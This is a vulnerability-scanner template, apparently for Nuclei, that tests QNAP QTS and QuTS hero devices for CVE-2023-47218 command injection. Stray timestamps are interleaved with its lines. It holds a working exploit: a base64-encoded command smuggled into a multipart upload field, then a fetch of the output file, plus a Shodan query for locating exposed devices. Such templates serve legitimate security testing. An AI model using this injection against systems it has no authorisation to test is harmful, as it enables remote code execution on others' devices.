2024-04-05 04:28:31 +00:00
id : CVE-2023-47218
info :
name : QNAP QTS and QuTS Hero - OS Command Injection
author : ritikchaddha
2024-04-05 07:19:34 +00:00
severity : high
2024-04-05 04:28:31 +00:00
description : |
An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions : QTS 5.1.5.2645 build 20240116 and later QuTS hero h5.1.5.2647 build 20240118 and later QuTScloud c5.1.5.2651 and later.
reference :
- https://github.com/passwa11/CVE-2023-47218
- https://twitter.com/win3zz/status/1760224052289888668/photo/3
- https://www.rapid7.com/blog/post/2024/02/13/cve-2023-47218-qnap-qts-and-quts-hero-unauthenticated-command-injection-fixed/
- https://nvd.nist.gov/vuln/detail/CVE-2023-47218
classification :
2024-04-05 07:19:34 +00:00
cvss-metrics : CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score : 8.3
cwe-id : CWE-78
2024-04-05 04:28:31 +00:00
cve-id : CVE-2023-47218
metadata :
verified : true
max-request : 2
shodan-query : ssl.cert.issuer.cn:"QNAP NAS",title:"QNAP Turbo NAS"
tags : cve,cve2023,qnap,qts,quts,rce,intrusive
variables :
file : '{{rand_base(6)}}'
cmd : '%22$($(echo -n aWQ=|base64 -d)>{{file}})%22'
http :
- raw :
- |
POST /cgi-bin/quick/quick.cgi?func=switch_os&todo=uploaf_firmware_image HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data;boundary="avssqwfz"
--avssqwfz
Content-Disposition : form-data; xxpcscma="field2"; zczqildp="{{cmd}}"
Content-Type : text/plain
skfqduny
--avssqwfz–
- |
POST /cgi-bin/quick/{{file}} HTTP/1.1
Host : {{Hostname}}
matchers :
- type : dsl
dsl :
- 'contains_all(body_1, "code\": 200", "full_path_filename success")'
- 'contains_all(body_2, "uid=", "gid=")'
- 'status_code == 200'
condition : and